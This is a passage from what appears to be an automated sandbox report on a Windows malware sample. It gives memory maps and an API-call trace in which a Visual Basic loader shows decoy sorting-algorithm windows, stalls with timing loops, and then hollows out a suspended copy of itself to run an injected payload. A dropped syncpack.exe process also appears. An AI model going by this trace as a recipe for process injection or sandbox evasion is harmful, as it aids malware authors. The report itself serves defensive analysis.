rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x89c
1182 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\programdata\oyvgkgw.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\programdata\oyvgkgw.exe, process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x75a52055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75a25934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x75a259b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x75a7f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x75a7d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x75a7d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x752d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 246816924 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Fn
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = HeapSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create window_name = InsertSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252752 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252784 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 3
Fn
System Get Time type = Ticks, time = 252924 True 6
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252940 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252971 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252986 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253002 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253033 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253064 True 1
Fn
System Get Time type = Ticks, time = 253080 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253096 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253111 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253142 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253158 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253189 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253205 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253220 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253236 True 1
Fn
System Get Time type = Ticks, time = 253252 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253267 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253283 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253314 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253314 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253314 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253330 True 1
Fn
System Get Time type = Ticks, time = 253345 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253345 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253345 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253361 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253361 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253376 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253376 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253376 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253392 True 10
Fn
System Get Time type = Ticks, time = 253408 True 5
Fn
System Get Time type = Ticks, time = 253423 True 5
Fn
System Get Time type = Ticks, time = 253439 True 5
Fn
System Get Time type = Ticks, time = 253454 True 10
Fn
System Get Time type = Ticks, time = 253470 True 10
Fn
System Get Time type = Ticks, time = 253486 True 10
Fn
System Get Time type = Ticks, time = 253517 True 10
Fn
System Get Time type = Ticks, time = 253532 True 10
Fn
System Get Time type = Ticks, time = 253548 True 15
Fn
System Get Time type = Ticks, time = 253564 True 10
Fn
System Get Time type = Ticks, time = 253579 True 5
Fn
System Get Time type = Ticks, time = 253595 True 5
Fn
System Get Time type = Ticks, time = 253610 True 5
Fn
System Get Time type = Ticks, time = 253642 True 10
Fn
System Get Time type = Ticks, time = 253657 True 5
Fn
System Get Time type = Ticks, time = 253704 True 5
Fn
System Get Time type = Ticks, time = 253735 True 10
Fn
System Get Time type = Ticks, time = 253751 True 10
Fn
System Get Time type = Ticks, time = 253766 True 25
Fn
System Get Time type = Ticks, time = 253782 True 40
Fn
System Get Time type = Ticks, time = 253798 True 16
Fn
System Get Time type = Ticks, time = 253813 True 4
Fn
System Get Time type = Ticks, time = 253829 True 10
Fn
System Get Time type = Ticks, time = 253844 True 10
Fn
System Get Time type = Ticks, time = 253860 True 5
Fn
System Get Time type = Ticks, time = 253907 True 5
Fn
System Get Time type = Ticks, time = 253922 True 1
Fn
System Get Time type = Ticks, time = 253969 True 5
Fn
System Get Time type = Ticks, time = 253985 True 14
Fn
System Get Time type = Ticks, time = 254000 True 10
Fn
System Get Time type = Ticks, time = 254016 True 5
Fn
System Get Time type = Ticks, time = 254032 True 5
Fn
System Get Time type = Ticks, time = 254047 True 10
Fn
System Get Time type = Ticks, time = 254063 True 5
Fn
System Get Time type = Ticks, time = 254078 True 5
Fn
System Get Time type = Ticks, time = 254094 True 5
Fn
System Get Time type = Ticks, time = 254110 True 5
Fn
System Get Time type = Ticks, time = 254125 True 10
Fn
System Get Time type = Ticks, time = 254141 True 15
Fn
System Get Time type = Ticks, time = 254156 True 5
Fn
System Get Time type = Ticks, time = 254172 True 5
Fn
System Get Time type = Ticks, time = 254188 True 10
Fn
System Get Time type = Ticks, time = 254203 True 10
Fn
System Get Time type = Ticks, time = 254219 True 5
Fn
System Get Time type = Ticks, time = 254234 True 5
Fn
System Get Time type = Ticks, time = 254250 True 5
Fn
System Get Time type = Ticks, time = 254266 True 5
Fn
System Get Time type = Ticks, time = 254281 True 5
Fn
System Get Time type = Ticks, time = 254297 True 5
Fn
System Get Time type = Ticks, time = 254328 True 15
Fn
System Get Time type = Ticks, time = 254344 True 5
Fn
System Get Time type = Ticks, time = 254359 True 5
Fn
System Get Time type = Ticks, time = 254375 True 5
Fn
System Get Time type = Ticks, time = 254390 True 5
Fn
System Get Time type = Ticks, time = 254406 True 5
Fn
System Get Time type = Ticks, time = 254422 True 5
Fn
System Get Time type = Ticks, time = 254437 True 5
Fn
System Get Time type = Ticks, time = 254453 True 10
Fn
System Get Time type = Ticks, time = 254468 True 5
Fn
System Get Time type = Ticks, time = 254484 True 20
Fn
System Get Time type = Ticks, time = 254515 True 6
Fn
System Get Time type = Ticks, time = 254531 True 49
Fn
System Get Time type = Ticks, time = 254546 True 45
Fn
System Get Time type = Ticks, time = 254562 True 35
Fn
System Get Time type = Ticks, time = 254578 True 5
Fn
System Get Time type = Ticks, time = 254593 True 40
Fn
System Get Time type = Ticks, time = 254609 True 20
Fn
System Get Time type = Ticks, time = 254624 True 5
Fn
System Get Time type = Ticks, time = 254640 True 45
Fn
System Get Time type = Ticks, time = 254656 True 45
Fn
System Get Time type = Ticks, time = 254671 True 30
Fn
System Get Time type = Ticks, time = 254687 True 35
Fn
System Get Time type = Ticks, time = 254702 True 17
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:28 (Local Time) True 1
Fn
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtAllocateVirtualMemory, address_out = 0x77bffab0 True 1
Fn
Module Load module_name = kernel32, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75fc5223 True 1
Fn
Module Load module_name = kernel32, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75fc103d True 1
Fn
Process Create process_name = C:\ProgramData\oyvGkGw.exe, os_pid = 0x62c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x77bffc70 True 1
Fn
Module Unmap process_name = C:\ProgramData\oyvGkGw.exe True 1
Fn
Memory Allocate process_name = C:\ProgramData\oyvGkGw.exe, address = 0x150004, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 277989832 True 1
Fn
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtWriteVirtualMemory, address_out = 0x77bffe04 True 1
Fn
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x400000, size = 512 True 1
Fn
Data
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x43c000, size = 512 True 1
Fn
Data
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x401000, size = 239104 True 1
Fn
Data
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtGetContextThread, address_out = 0x77c00c20 True 1
Fn
Thread Get Context process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Fn
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x7efde008, size = 4 True 1
Fn
Data
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetContextThread, address_out = 0x77c01910 True 1
Fn
Thread Set Context process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Fn
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtResumeThread, address_out = 0x77c00058 True 1
Fn
Thread Resume process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Fn
Module Load module_name = kernel32, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x75fd174d True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268259 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268306 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0, value_name = AllowUnsafeObjectPassing, data = 68, type = REG_NONE False 1
Fn
File Get Info filename = C:\Windows\system32\.HLP, type = file_attributes False 2
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
File Get Info filename = C:\Windows\Help\.HLP, type = file_attributes False 2
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Process #10: syncpack.exe
47 0
»
Information Value
ID #10
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x8a0
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 608
0x A8
0x 79C
0x 280
0x 740
0x 978
0x 9B0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00212fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00220000 0x00220fff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x00222fff Pagefile Backed Memory Readable True False False -
